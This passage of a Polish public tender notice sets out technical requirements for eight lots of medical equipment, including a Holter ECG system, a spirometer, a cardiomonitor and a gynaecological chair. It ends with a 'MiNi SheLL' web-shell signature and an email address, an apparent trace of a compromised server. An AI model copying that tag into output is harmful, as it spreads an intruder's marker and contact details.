-analiza w trybie prospektywnym i retrospektywnym;
-analiza automatyczna oparta na tworzeniu wzorców pobudzeń;
-automatyczna analiza arytmii komorowych i nadkomorowych;
-automatyczna analiza odcinka ST;
-możliwość konfiguracji parametrów analizy;
-możliwość korekty klasyfikacji każdego pobudzenia;
-automatyczny dobór przykładów ilustrujących epizody arytmii i zmiany odcinka ST;
-baza danych pacjentów i badań;
-możliwość konfiguracji raportu końcowego;
-możliwość analizy zapisów dłuższych niż 36 godzin;
-możliwość analizy zapisów z dwunastu odprowadzeń;
-możliwość wyboru analizowanych kanałów od 1 do 3;
-możliwość ustawienia punktów pomiarowych ST niezależnie dla każdego kanału;
-natychmiastowy dostęp do zapisu EKG z dowolnego poziomu analizy (tabele, trendy);
-możliwość prezentacji pobudzeń z danej klasy w trybie stronicowym;
-możliwość bezpośredniej edycji tabeli arytmii;
-analiza epizodów obniżenia odcinka ST z uwzględnieniem rodzaju nachylenia;
-automatyczna kalibracja;
-możliwość wyłączenia z analizy fragmentów zapisu;
-analiza czasowa HRV , prezentacja wyników w formie graficznej;
-analiza spektralna HRV, prezentacja wyników w formie graficznej;
-archiwizacja bazy danych;
-licencjonowane oprogramowanie;
-system zainstalowany na dedykowanym stanowisku z mobilnym stolikiem pod zestaw, wyposażonym w komputer PC typu laptop z systemem operacyjnym Windows 7 lub nowszym, o przekątnej monitora min. 15,4, drukarka laserowa A4 (proszę podać skład zestawu oraz podstawowe parametry oferowanych elementów zestawu);
b)Wymagania dotyczące rejestratora holterowskiego EKG:
-rejestrator cyfrowy;
-liczba rejestrowanych odprowadzeń min. 3;
-czas rejestracji min.48 godziny;
-liczba elektrod max. 7;
-automatyczna rejestracja momentu rozpoczęcia badania (data, godzina);
-rejestracja bez kompresji danych;
-przycisk zdarzeń pacjenta;
-detekcja pików rozrusznika serca;
-zasilanie maksymalnie z 2 baterii AA 1,5V lub akumulatorków;
-kontrola stanu baterii oraz podłączenia elektrod;
-podgląd zapisu EKG na monitorze komputera w czasie rzeczywistym;
-zachowanie danych EKG bez zasilania rejestratora;
-sygnalizacja stanu aktywności rejestratora;
-masa max 200 gram;
-przedmiot oferty będzie fabrycznie nowy;
-instrukcja obsługi przedmiotu oferty w języku polskim;
-przeszkolenie pracownika Zamawiającego w zakresie obsługi przedmiotu oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Spirometr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Parametry jakościowe i cechy techniczno-użytkowe:
-spirometr diagnostyczny - komputerowy;
-zasilanie - port USB;
-czujnik typ - Pneumotach;
-możliwość przeprowadzania testów: FVC, SVC, MVV, Pre-Post BD;
-3 pompy wymuszające cyrkulację płynu podczas procesu dezynfekcji;
-zakres objętości 0-14  l;
-zakres przepływu +/- 14 l/s;
-posiadanie następujących parametrów: FVC, FIVC, FIV1, FIV1%, FEV0.5, FEV1, FEV2, FEV3, FEV5, FEV6, FEVO.5, FEV0.5%, FEV 1%, FEV1/FVC, FEV2%, FEV3%, FEV5%, FEV6%, PEF, FEF,25, FEF50, FEF75, FEF0,2-1,2, FEF25-75, FEF75-85, PIF, FIF50, FEF50/FIF50, FFV1/FEV6, FET, MEF25, MEF50, MEF75, SVC, ERV, IRV, VT, IC, BF, MV, Tin, Tex, Tin/Tex, MVV, MV, VT, BF, Czas, DFRC;
-możliwość tworzenia następujących raportów: FVC - objętość/czas, FVC -przepływ/objętość, FVC - zarówno objętość/czas jak i przepływ/objętość, SVC -objętość/czas;
-dostosowywalne formaty raportów;
-dźwiękowe i wizualne bodźce w instruowaniu pacjentów służące jako pomoc;
-dokładność i powtarzalność wg standardu ATS/ERS 2005;
-pompa kalibracyjna 3 l;
-ustniki jednorazowe - 100 szt. w zestawie;
-wykresy przepływ/czas i przepływ/objętość w czasie rzeczywistym;
-automatyczna interpretacja;
-instrukcje w języku polskim;
-oprogramowanie w języku polskim;
-aparat musi spełniać normy: ATS, NIOSH, OSHA I Social Security..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nosze - transporter.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagania techniczno-eksploatacyjne:
-transporter - stół do zabiegów chirurgicznych, opatrunkowych;
-możliwość zmiany wysokości leża pompą hydrauliczną;
-pochyły Trendelenburga i anty- Trendelenburga;
-możliwość unoszenia oparcia pleców wspomagane sprężynami gazowymi z blokadą;
-transporter nie musi być wyposażony w koła ,ale jeżeli będzie to powinien mieć centralną blokadę kół..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.60-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kontener na materiały sterylizowane - 2 zestawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagania techniczno-eksploatacyjne:
-kontener narzędziowy wykonany z aluminium w wymiarach zewnętrznych 592x285x157 mm. z pokrywą bezobsługową z tworzywa sztucznego odporną na wysoką temperaturę i ciśnienie pasującą do kontenera z filtrem teflonowym na min. 5000 cykli sterylizacji w kolorze czerwonym 1szt.;
-kontener narzędziowy wykonany z aluminium w wymiarach zewnętrznych 592x285x209mm. z pokrywą bezobsługową z tworzywa sztucznego odporną na wysoką temperaturę i ciśnienie pasującą do kontenera z filtrem teflonowym na min. 5000 cykli sterylizacji w kolorze zielonym 1 szt.;
-kontener narzędziowy wykonany z aluminium w wymiarach zewnętrznych 300x285x157 mm. z pokrywa bezobsługową z tworzywa sztucznego odporną na wysoką temperaturę i ciśnienie pasującą do kontenera z filtrem teflonowym na min. 5000 cykli sterylizacji w kolorze czerwonym 3 szt.;
-kosze do kontenerów ze stali nierdzewnej z rączkami (uchwytami) do przenoszenia o wymiarach zewnętrznych 243x253x106 mm. 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kardiomonitor modułowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Wymagane parametry graniczne:
-monitor przystosowany do pracy w sieci;
-modułowa budowa systemu - moduły parametrowe wymienialne między monitorami. możliwość wymiany modułów bez wyłączania monitora;
-typ ekranu: LCD TFT;
-posiadanie kanałów dynamicznych (proszę o podanie ilości kanałów w złożonej ofercie);
-zasilanie monitora 230V?10% / 50Hz;
-wielopoziomowy system alarmów akustycznych i optycznych (proszę o dokładny opis w złożonej ofercie);
-prezentacja wyników pomiarowych oraz wartości alarmowych w formie numerycznej;
-trendy graficzne mierzonych parametrów.

b)Wymagania związane z pomiarem EKG/ST/Resp:

-minimum 2 odprowadzenia EKG wyświetlane jednocześnie;
-analiza odchylenia odcinka ST;
-analiza arytmii;
-pomiar częstości oddechów (proszę o podanie zakresu w złożonej ofercie);
-ustawianie granic alarmowych częstości akcji serca, odchylenia odcinka ST, częstości oddechu oraz czasu trwania bezdechu;
-kabel EKG 5-cio lub 3 odprowadzeniowy z kompletem elektrod.

c)Wymagania związane z pomiarem ciśnienia metodą nieinwazyjną:
-wyświetlanie wartości ciśnień skurczowego, rozkurczowego i średniego;
-możliwość pomiaru u dorosłych, dzieci i noworodków;
-ustawianie granic alarmowych ciśnienia skurczowego, rozkurczowego i średniego;
-tryb pracy ręczny i automatyczny (podać przedziały czasowe).

d)Wymagania związane z pomiarem saturacji i pletyzmografii:
-zakres pomiarowy saturacji od 40 do 100 %;
-zakres pomiarowy częstości pulsu co najmniej 30-240 P/min;
-ustawianie granic alarmowych %saturacji oraz częstości pulsu;
-czujnik pomiarowy dla dorosłych na palec.

e)Wymagania związane z pomiarem temperatury (dwa kanały):
-wielorazowy czujnik do pomiaru temperatury na powierzchni skóry;
-posiadanie zakresu pomiarowego(podać zakres);
-wieszak pod kardiomonitor mocowany do ściany..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Fotel ginekologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagania techniczno-eksploatacyjne:

-fotel przeznaczony do przeprowadzania badań o zabiegów ginekologicznych i urologicznych;
-konstrukcja fotela wykonana z profili stalowych pokrytych lakierem proszkowym;
-tapicerka bezszwowa, odporna na działanie środków dezynfekcyjnych;
-długość fotela do1300 mm;
-szerokość fotela do 650 mm;
-wysokość siedziska: min. 800 mm; 
-funkcja regulacji oparcia pleców (kąt odchylenia co najmniej 60o);
-możliwość uzyskania pozycji leżacej, pozycji Trendelenburga ( kąt przechyłu co najmniej  20 o), pozycji   anty- Trendelenburga (kąt przechyłu co najmniej 10o);
-wymagane wyposażenie fotela: podłokietniki, pojemnik ze stali nierdzewnej, uchwyty ręki, podpora stóp;
-fotel ginekologiczny musi posiadać Deklarację Zgodności CE i rejestrację wyrobu;
-możliwość uzyskania szybkiej pomocy technicznej - do 24 godzin w razie awarii sprzętu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wywoływarka do zdjęć RTG stomatologiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagania techniczno-eksploatacyjne:
-wywoływarka półautomatyczna z możliwością podgrzewania odczynników do zdjęć zewnątrzustnych;
-wskaźnik czasu wymiany odczynników;
-system światła dziennego;
-wersja do mocowania na ścianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.15.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com